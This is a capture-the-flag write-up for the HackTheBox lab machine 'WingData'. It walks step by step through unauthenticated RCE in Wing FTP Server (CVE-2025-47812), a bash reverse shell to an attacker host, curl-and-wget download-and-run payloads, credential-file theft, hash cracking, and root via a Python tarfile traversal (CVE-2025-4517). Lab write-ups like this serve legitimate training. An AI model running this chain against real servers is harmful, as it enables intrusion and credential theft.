Share
## https://sploitus.com/exploit?id=35F21C2D-0B83-5CFB-A3C2-6633DF013DBF
# HackTheBox - WingData Writeup
**Difficulty:** Easy | **OS:** Linux | **Season:** 10


## Summary
WingData is an Easy Linux machine demonstrating a full attack chain from
unauthenticated service exploitation to root privilege escalation.
**Attack Chain:**
RCE (CVE-2025-47812) โ Credential Extraction โ Hash Cracking โ SSH โ Root (CVE-2025-4517)
---
## Enumeration
### Nmap
```bash
nmap -sCV -A 10.129.244.106
```
**Open Ports:**
- 22/tcp โ OpenSSH 9.2p1 (Debian)
- 80/tcp โ Apache 2.4.66 โ redirects to `wingdata.htb`
### /etc/hosts
```bash
echo "10.129.244.106 wingdata.htb ftp.wingdata.htb" | sudo tee -a /etc/hosts
```
### Directory Fuzzing
```bash
ffuf -u http://wingdata.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt \
-mc 200,301,302,403 -t 40
```
Notable findings: `/assets`, `/vendor`
### FTP Subdomain
Browsing to `http://ftp.wingdata.htb` reveals:
**Wing FTP Server v7.4.3** โ vulnerable to CVE-2025-47812
---
## Initial Access โ CVE-2025-47812 (Unauthenticated RCE)
```bash
git clone https://github.com/4m3rr0r/CVE-2025-47812-poc.git
cd CVE-2025-47812-poc
```
Start listener:
```bash
nc -lvnp 5555
```
Serve payload and exploit:
```bash
echo 'bash -i >& /dev/tcp/YOUR_IP/5555 0>&1' > /tmp/shell.sh
cd /tmp && python3 -m http.server 8080
python3 CVE-2025-47812.py -u http://ftp.wingdata.htb \
-c "curl http://YOUR_IP:8080/shell.sh|bash" -v
```
Shell received as `wingftp` user.
---
## Credential Extraction
```bash
cat /opt/wftpserver/Data/1/users/wacky.xml
```
Extracted hash:
### Hash Cracking (Hashcat)
```bash
echo "HASH:WingFTP" > wacky.txt
hashcat -m 1410 wacky.txt /usr/share/wordlists/rockyou.txt
```
**Cracked:** `*********^*Bride5`
---
## Lateral Movement โ SSH as wacky
```bash
ssh wacky@10.129.244.106
# password: !#*********Bride5
cat ~/user.txt # User flag โ
```
---
## Privilege Escalation โ CVE-2025-4517
### Sudo Enumeration
```bash
sudo -l
# (root) NOPASSWD: /usr/local/bin/python3 /opt/backup_clients/restore_backup_clients.py *
```
The backup restore script runs as root and uses `tarfile.extractall()`
insecurely, allowing a malicious tar archive to overwrite `/etc/sudoers`.
### Exploit
```bash
# On Kali
git clone https://github.com/AzureADTrent/CVE-2025-4517-POC-HTB-WingData.git
cd CVE-2025-4517-POC-HTB-WingData
python3 -m http.server 80
# On target
cd /tmp
wget http://YOUR_IP/CVE-2025-4517-POC.py
python3 /tmp/CVE-2025-4517-POC.py
```
### Root Shell
```bash
sudo /bin/bash
id # uid=0(root)
cat /root/root.txt # Root flag โ
```
---
## CVEs Referenced
| CVE | Description |
|-----|-------------|
| CVE-2025-47812 | Wing FTP Server v7.4.3 Unauthenticated RCE |
| CVE-2025-4517 | Python tarfile path traversal via insecure extraction |
---
## Tools Used
- nmap
- ffuf
- netcat
- hashcat
- Python3
---
*Writeup by [KARIM ELSHEIKH] โ HackTheBox Season 10*